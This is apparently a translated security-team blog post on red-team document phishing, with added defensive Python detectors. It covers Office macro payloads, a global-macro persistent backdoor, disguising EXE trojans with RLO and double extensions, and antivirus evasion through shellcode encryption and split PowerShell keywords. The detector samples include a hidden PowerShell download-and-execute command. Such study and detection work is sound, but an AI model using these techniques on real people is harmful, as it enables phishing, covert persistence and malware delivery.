

A first look at document phishing in attack-and-defense drills and competitions

Posted by bassolino at 2020-03-08

Shandong new trend information


Statement: this is an original article of the Tide security team; please credit the source when reprinting! The technologies, ideas and tools involved in this article are for learning and exchange for security purposes only. No one may use them for illegal purposes or for profit, or the consequences will be borne by themselves!

*Author: promise@tidesec; please credit the source when reprinting.

This year I took part in several network-protection competitions. Other teams scored a lot of points by combining social engineering with document phishing; I had not accumulated relevant knowledge before, so I lost some points in this area.

Macros are a special feature Microsoft designed for its Office suite. Macro-enabled files have their own suffixes, such as .xlsm, .docm and .pptm.

1. Generating a payload with MSF

The -f option selects the output format, here VBA macro code. First create a new Office file that supports macros; .docm is used for the demonstration. Select File > Options > Customize Ribbon and enable the Developer tab. Click the Macros button to create a new macro, and paste the macro code generated by MSF into the code window. Save the file, then start the MSF listener for the reverse connection. Open the generated 1.docm: a security warning appears saying that macros have been disabled. Click Enable Content, and the session comes back successfully.

2. Generating a payload with CS

CS can also generate Office macro code: choose a listener and copy the generated code straight into the macro code window. The beacon checks in successfully.

Practical use

Besides the plain Office macro there are other ways to use the technique, such as injecting a remote template into a .docx so that the macro is executed, and using shellcode for AV evasion. In practice the first task is to gain the other party's trust: name the document to match the phishing target and send it by email, for example as "XX company purchasing instructions".

Office macro phishing has several limitations:

1. The target's computer does not use Office.

2. Office disables macros by default and shows a prompt when the file is opened.

3. The distinctive macro-enabled suffixes (.docm, .xlsm, etc.) easily raise suspicion.

4. The AV evasion requirements are high.

Global macros as a persistent backdoor

Besides phishing, Office macros can also be used to build a hidden persistent backdoor. Create a new macro and choose to store it in "All active templates and documents", so that it is stored globally rather than in the current file. Write the macro code in ThisDocument and save. The hidden persistence backdoor is in place: opening any document triggers the macro code, and the AV software does not react.
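From the defender's side, the two things worth checking against this section are whether a document carries VBA at all (by content, since the suffix can be renamed) and whether a global template such as Normal.dotm has acquired a VBA project. The following Python is an added example, not code from the article or the Tide team; the Word template paths are the default Windows locations (assumed), and the sample files in demo() are constructed.

```python
import os
import tempfile
import zipfile
from pathlib import Path

def has_vba_project(path):
    """True if an OOXML container (a zip) carries an embedded VBA project part."""
    try:
        with zipfile.ZipFile(path) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except (zipfile.BadZipFile, OSError):
        return False  # not OOXML; legacy .doc/.xls need an OLE parser instead

def scan_dir(root):
    """Names of Office files under root that embed VBA, judged by content, not suffix:
    a .docm renamed to .docx still carries word/vbaProject.bin."""
    office = {".docx", ".docm", ".dotx", ".dotm", ".xlsx", ".xlsm", ".pptx", ".pptm"}
    return [p.name for p in sorted(Path(root).rglob("*"))
            if p.is_file() and p.suffix.lower() in office and has_vba_project(p)]

def global_templates_with_vba():
    """Word global templates (Normal.dotm and STARTUP add-ins) that carry VBA: where a
    macro stored in 'all active templates and documents' lands. Default paths assumed."""
    appdata = os.environ.get("APPDATA")
    if not appdata:
        return []  # not a Windows user profile
    candidates = [Path(appdata) / "Microsoft" / "Templates" / "Normal.dotm"]
    candidates += (Path(appdata) / "Microsoft" / "Word" / "STARTUP").glob("*.dot*")
    return [str(c) for c in candidates if c.is_file() and has_vba_project(c)]

def demo():
    """Scan a constructed sample tree (fake zip entries, not real documents)."""
    root = Path(tempfile.mkdtemp())
    with zipfile.ZipFile(root / "purchasing.docm", "w") as zf:  # macro document
        zf.writestr("word/vbaProject.bin", b"constructed placeholder")
    with zipfile.ZipFile(root / "invoice.docx", "w") as zf:  # .docm renamed to .docx
        zf.writestr("word/vbaProject.bin", b"constructed placeholder")
    with zipfile.ZipFile(root / "clean.docx", "w") as zf:  # no macros
        zf.writestr("word/document.xml", b"<w:document/>")
    return scan_dir(root)
```

A non-empty result from global_templates_with_vba() on a user's profile is exactly the footprint the "all active templates and documents" backdoor leaves.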

Executable EXE files

Both MSF and CS can generate reverse-connection Trojans, which are triggered by a mouse click. When an EXE Trojan is used for phishing, three main problems have to be solved:

1. Hiding the suffix

2. Changing the file icon

3. AV evasion for the file

Hiding the suffix

The classic ".jpg.exe"

By default, Windows hides the extensions of known file types.

Using the .scr extension

A .scr file is equivalent to an .exe.

Unitrix suffix reversal

Rename the file to "important data xgpj.scr", place the cursor before the g and insert an RLO (right-to-left override) character; the suffix is now hidden. In testing, both the .scr extension and the Unitrix reversal are flagged directly by 360.
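The three suffix tricks above are all visible in the filename itself, so a mail gateway or endpoint script can flag them before a user ever sees the icon. The following Python is an added example (not code from the article): it reports the extension the OS will really use, shows how the name renders with RLO and with Windows' hidden-extension default, and lists the reasons a name looks disguised; the keyword lists are illustrative assumptions.

```python
# Bidi override/embedding code points that change how a name is rendered, incl. RLO U+202E.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e", "\u2066", "\u2067", "\u2068", "\u2069"}
RLO = "\u202e"
# Extensions Windows runs on double-click; .scr (screensaver) is a PE executable like .exe.
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".hta"}
# Decoy extensions typically placed in front of the real one ("photo.jpg.exe").
DECOY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}

def real_extension(name):
    """The extension the OS actually uses: after the last dot, with bidi controls stripped."""
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    dot = clean.rfind(".")
    return clean[dot:].lower() if dot != -1 else ""

def displayed_name(name, hide_known_ext=False):
    """Approximate what Explorer shows: optionally drop the real extension (the default
    'hide extensions for known file types' setting), then render a single RLO."""
    if hide_known_ext and real_extension(name):
        name = name[: name.rfind(".")]
    if RLO in name:
        head, tail = name.split(RLO, 1)
        name = head + tail[::-1]  # text after RLO is drawn right-to-left
    return name

def classify_filename(name):
    """Reasons a filename looks like it is disguising an executable (empty = nothing seen)."""
    reasons = []
    if any(ch in BIDI_CONTROLS for ch in name):
        reasons.append("bidi override character in name")
    ext = real_extension(name)
    if ext in EXEC_EXTS:
        reasons.append("executable extension " + ext)
    parts = name.lower().split(".")
    if len(parts) > 2 and "." + parts[-2] in DECOY_EXTS and ext in EXEC_EXTS:
        reasons.append("double extension ." + parts[-2] + ext)
    return reasons
```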

Changing the file icon

Use Restorator to change the icon of the EXE file. Drag both the Trojan file and the target exe whose icon you want to copy into the program, drag the 360 icon onto aaa.exe, and save the file: the icon is replaced.

AV evasion for the file

Two evasion approaches are introduced.

AVIator

Download (portal): a backdoor generator utility that uses encryption and injection techniques to bypass AV detection, and comes with RTLO and icon-change features. It AES-encrypts a given shellcode to produce an executable containing the encrypted payload; at run time the shellcode is decrypted and injected into the target using one of several injection techniques. There are three input fields: the encryption key used to encrypt the shellcode, the AES IV, and the shellcode itself. The left side of the program lists the steps for the MSF workflow; CS is used for this demonstration.

1. Generate the C# payload.

2. Keep the hex form and remove the spaces with Notepad++.

3. Copy it into the payload box for encryption.

4. Optionally reverse the suffix (some anti-virus products flag this as malware), replace the icon, choose the injection technique, and generate the file.

It can bypass most AV; on this machine it bypassed 360's dynamic and static detection perfectly.

PowerShell evasion

At present, the AV products' ability to detect PowerShell is not strong.

Evasion idea: first obtain a PowerShell payload, call PowerShell through another language's system-command function, and finally package it into an exe. The payload generated automatically by CS is used.

The next goal is to evade detection of the executed PowerShell statement. Many of the ideas are the same as for webshells: bypassing keyword detection needs your own experimentation. Here is one PowerShell evasion technique.

Keyword splitting

Before splitting:

In testing, downloadstring is detected, so it is split up. After splitting:

The AV is bypassed. Detection of other keywords can be bypassed in the same way. Use C's system() function to execute PowerShell.

Compiled into an exe of 180 KB, most AV products do not flag it. After running, the beacon checks in, but a black console window is left behind. -W hidden can hide the window, but "hidden" is flagged; splitting "hidden" may bypass this. PowerShell can do much more, such as privilege escalation, and there are more ways to use it.
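The splitting described above only defeats a detector that matches raw text. The following Python is an added example (not code from the article) of the normalization a detection rule can apply first: fold "a"+"b" concatenations and strip backtick escapes, then match keywords; the keyword list and the two command lines are constructed test inputs, and example.invalid is a reserved test domain.

```python
import re

# Keywords worth a review when seen in a PowerShell command line (illustrative list).
SUSPECT_KEYWORDS = ["downloadstring", "invoke-expression", "iex", "frombase64string",
                    "-windowstyle hidden", "-w hidden", "-encodedcommand"]

# "ab" + "cd" or 'ab'+'cd' -> "abcd": the split-keyword trick described in the article.
CONCAT_RE = re.compile(r"""(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3""")

def normalize(cmd):
    """Undo cheap string obfuscation so keyword matching sees the joined text."""
    s = cmd.replace("`", "")  # backtick escapes inside double quotes: Down`loadString
    prev = None
    while prev != s:  # fold chains of concatenated literals until nothing changes
        prev = s
        s = CONCAT_RE.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', s)
    s = re.sub(r"""["'()]""", "", s)  # drop quotes/parens left around folded literals
    return re.sub(r"\s+", " ", s).lower()

def suspicious_keywords(cmd):
    """Keywords from SUSPECT_KEYWORDS present in the normalized command."""
    norm = normalize(cmd)
    return [k for k in SUSPECT_KEYWORDS if k in norm]

# Constructed samples (not from the article): the same command, plain and split.
SAMPLE_PLAIN = ('powershell -w hidden -c "IEX (New-Object Net.WebClient)'
                ".DownloadString('http://example.invalid/a')\"")
SAMPLE_SPLIT = ('powershell -w ("hid"+"den") -c "IEX (New-Object Net.WebClient)'
                ".('Down'+'loadString').Invoke('http://example.invalid/a')\"")
```

Both samples produce the same keyword hits after normalization, which is the property the "before splitting" and "after splitting" screenshots show a raw-text scanner lacking.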


Whether it is a macro file or a phishing Trojan, successful file phishing cannot do without social engineering; how to gain someone's trust quickly is the hard part. Unsolved problem: bypassing AV detection of the hidden real file suffix. If you have ideas, you can contact me ~



The Tide security team was formally established in January 2019. It is the security team of New Trend Information and focuses on research into Internet attack and defense technology. It currently brings together more than ten professional security attack-and-defense researchers, working on network attack and defense, web security, mobile terminals, secure development, IoT/industrial control security and other directions.

For more from the Tide security team, follow the team's official website http://www.TideSec.com or long-press the QR code to follow the official account: